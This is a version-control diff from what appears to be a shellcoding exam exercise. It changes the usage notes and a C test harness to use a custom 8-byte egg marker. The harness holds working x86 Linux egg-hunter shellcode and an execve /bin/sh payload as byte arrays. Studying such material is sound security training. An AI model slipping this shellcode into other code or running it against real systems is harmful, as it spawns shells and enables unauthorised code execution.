minor updates

exam3/USAGE

@@ -7,10 +7,11 @@ I'm using a symlink as follows
 exam3$ ln -svf payload-execve-stack.nasm payload.nasm
 `payload.nasm' -> `payload-execve-stack.nasm'
 
+
 2. Compile the shellcode with a custom "egg" (must be 8 bytes in length)
 
-exam3$ ./make.sh 
- [I] Argument not specified. Using default EGG mark.
+exam3$ ./make.sh "egg.mark"
+ [I] Using custom EGG mark: egg.mark
  [+] Compiling payload.nasm ...
  [+] Compiling hunter.nasm ...
  [+] Extracting PAYLOAD code from payload ...
@@ -19,9 +20,10 @@ exam3$ ./make.sh
  [+] Extracting HUNTER code from hunter ...
  [+] Checking HUNTER code for NULLs ...
  [+] Compiling shellcode.c ...
--rwx------. 1 arno arno 5100 Mar 27 16:46 ./shellcode
+-rwx------. 1 arno arno 5100 Mar 27 16:47 ./shellcode
  [+] All done!
 
+
 3. Run the shellcode
 
 exam3$ ./shellcode 

exam3/shellcode.c

@@ -1,11 +1,11 @@
 #include <stdio.h>
 #include <string.h>
 
-unsigned char hunter[] = "\xeb\x16\x58\x40\x81\x78\xf8\x45\x67\x67\x2d\x75\xf6\x81\x78\xfc\x4d\x61\x72\x6b\x75\xed\xff\xd0\xe8\xe5\xff\xff\xff";
+unsigned char hunter[] = "\xeb\x16\x58\x40\x81\x78\xf8\x65\x67\x67\x2e\x75\xf6\x81\x78\xfc\x6d\x61\x72\x6b\x75\xed\xff\xd0\xe8\xe5\xff\xff\xff";
 
 unsigned char garbage1[] = "Just some garbage here...";
 
-unsigned char payload[] = "\x45\x67\x67\x2d\x4d\x61\x72\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
+unsigned char payload[] = "\x65\x67\x67\x2e\x6d\x61\x72\x6b\x31\xc0\xb0\x0b\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\x52\x89\xe2\xcd\x80";
 
 unsigned char garbage2[] = "And some garbage there...";